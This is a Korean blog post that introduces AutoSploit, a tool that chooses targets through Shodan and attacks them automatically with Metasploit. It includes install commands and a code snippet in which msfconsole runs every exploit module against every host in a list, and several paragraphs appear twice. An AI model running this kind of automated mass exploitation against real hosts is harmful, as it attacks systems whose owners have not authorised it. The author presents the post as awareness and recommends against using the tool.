[HACKING] Shodan API와 Metasploit을 이용한 Exploiting script - AutoSploit
원래 LanGhost 내용으로 글 써볼까 헀다가.. (절대 라즈베리파이 키기 귀찮아서 그런게 아닙니다.... 관심있으시면 우선 구글링 고고) 급 주제를 바꾸어 툴 하나에 대해 이야기하도록 하죠.
오늘은 이번주에 나름 핫했던.. AutoSploit입니다.
자동을 대상을 선정하고, 공격하고, 권한을 획득할 수 있다는 점에서 조금 위험한 툴로 보입니다만.. 이미 350명이 넘는 사람이 fork 중이네요. (물론 저도..)
File tree
.
├── Docker
│ ├── Dockerfile
│ ├── README.md
│ └── database.yml
├── LICENSE
├── README.md
├── autosploit.py // Main code
├── modules.txt // Msf module list
└── requirements.txt // 추가 요청한거
#> git clone https://github.com/NullArray/AutoSploit
#> cd AutoSploit
필요한 라이브러리 설치가 필요합니다.shodan과 blessings 입니다.
#> pip install shodan
#> pip install blessings
pull request를 하나 던져놓긴했는데.. 혹시라도 된다면
pip install -r requirements.txt로 되겠지요.
쓸만한 데이터가 있을까 코드를 보았는데요.. 단순하게 msfonsole command line으로 값을 넘기는 형태입니다.
재미있는 코드를 기대했지만 조금 아쉬운감이 있었습니다.
윤리적이나 개인의 기술적 발전이나.. 사용하는 것 자체는 추천드리진 않습니다. 그저 이런게 있구나... 하고 알아가시면 좋을 것 같단 생각에 포스팅합니다.
(어차피 침투과정 연습하시는거라도 직접하는게 더 정확하고, 결과도 좋을겁니다)
오늘은 이번주에 나름 핫했던.. AutoSploit입니다.
What is AutoSploit?
AutoSploit은 원격 호스트에 대한 자동 서칭, Exploit 툴, 스크립트 정도로 생각하시면 좋을 것 같습니다. 파이썬 기반의 코드이며 Shodan을 이용해서 임의의 대상을 선정하고, Metasploit 모듈로 Exploiting 합니다.자동을 대상을 선정하고, 공격하고, 권한을 획득할 수 있다는 점에서 조금 위험한 툴로 보입니다만.. 이미 350명이 넘는 사람이 fork 중이네요. (물론 저도..)
File tree
.
├── Docker
│ ├── Dockerfile
│ ├── README.md
│ └── database.yml
├── LICENSE
├── README.md
├── autosploit.py // Main code
├── modules.txt // Msf module list
└── requirements.txt // 추가 요청한거
How to install?
저장소에서 다운로드합니다.#> git clone https://github.com/NullArray/AutoSploit
#> cd AutoSploit
필요한 라이브러리 설치가 필요합니다.shodan과 blessings 입니다.
#> pip install shodan
#> pip install blessings
pull request를 하나 던져놓긴했는데.. 혹시라도 된다면
pip install -r requirements.txt로 되겠지요.
Metasploit 어떻게 연결했을까?
처음에 툴 내용을 대충보았을땐 Metasploit과 직접 연동되는걸까 라는 생각에 설레였습니다.쓸만한 데이터가 있을까 코드를 보았는데요.. 단순하게 msfonsole command line으로 값을 넘기는 형태입니다.
elif choice == 'a':
with open( "hosts.txt", "rb" ) as host_list:
for rhosts in host_list:
for exploit in all_modules:
template = "sudo msfconsole -x 'workspace -a %s; setg LHOST %s; setg LPORT %s; setg VERBOSE true; setg THREADS 100; set RHOSTS %s; %s'" % (workspace, local_host, local_port, rhosts, exploit)
os.system(template)
Conclusion
이런 종류의 프로젝트나 툴들은 많이 있었을겁니다. 다만 kitploit이나 thehackernews등 매체를 통해서 수면위로 올라온 이상 이를 사용하는 사람들도 분명히 늘어날 것이라 생각됩니다.윤리적이나 개인의 기술적 발전이나.. 사용하는 것 자체는 추천드리진 않습니다. 그저 이런게 있구나... 하고 알아가시면 좋을 것 같단 생각에 포스팅합니다.
(어차피 침투과정 연습하시는거라도 직접하는게 더 정확하고, 결과도 좋을겁니다)